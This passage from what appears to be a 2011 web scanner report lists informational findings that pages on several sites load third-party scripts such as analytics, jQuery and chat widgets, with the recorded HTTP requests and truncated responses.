<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.830. http://www.moxiesoft.com/tal_products/request_demo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/request_demo.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx

Request

GET /tal_products/request_demo.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.831. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://d.yimg.com/mi/ywa.js
http://e.yieldmanager.net/script.js
http://tweetmeme.com/i/scripts/button.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:48 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223848"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 95223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</fb:like> <script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="small-votes">http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1</script>
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

18.832. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://d.yimg.com/mi/ywa.js
http://e.yieldmanager.net/script.js
http://tweetmeme.com/i/scripts/button.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:49 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223849"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 102098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</fb:like> <script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="small-votes">http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm</script>
...[SNIP]...

18.833. http://www.paperg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.834. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /flyerboard/soundings-publications-llc/2123/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4376
Connection: close
Via: 1.1 AN-0016020122637050

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>

   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.835. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://ssl.google-analytics.com/urchin.js

Request

Response

18.836. http://www.parker-software.com/forum/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parker-software.com
Path:	/forum/

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/include.js?domain=forums.parkersoft.co.uk

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...

<script type='text/javascript' src='http://gateway.whoson.com/include.js?domain=forums.parkersoft.co.uk'></script>
...[SNIP]...

18.837. http://www.parkersoft.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET / HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.838. http://www.parkersoft.co.uk/about.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/about.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /about.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.839. http://www.parkersoft.co.uk/client.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/client.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.840. http://www.parkersoft.co.uk/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /contact.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.841. http://www.parkersoft.co.uk/email2db.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/email2db.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /email2db.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.842. http://www.parkersoft.co.uk/partners.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/partners.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /partners.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.843. http://www.parkersoft.co.uk/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/privacy.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /privacy.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.844. http://www.parkersoft.co.uk/products.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/products.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /products.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.845. http://www.parkersoft.co.uk/smsserver.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/smsserver.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /smsserver.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.846. http://www.parkersoft.co.uk/subscribe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/subscribe.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /subscribe.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.847. http://www.parkersoft.co.uk/supnotes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/supnotes.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /supnotes.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.848. http://www.parkersoft.co.uk/terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/terms.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /terms.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.849. http://www.parkersoft.co.uk/whoson.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/whoson.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk

Request

GET /whoson.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>

<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.850. http://www.quantcast.com/p-352ZWwG8I7OVQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quantcast.com
Path:	/p-352ZWwG8I7OVQ

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET /p-352ZWwG8I7OVQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

18.851. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.852. http://www.soundingsonline.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.853. http://www.soundingsonline.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The response dynamically includes the following script from another domain:

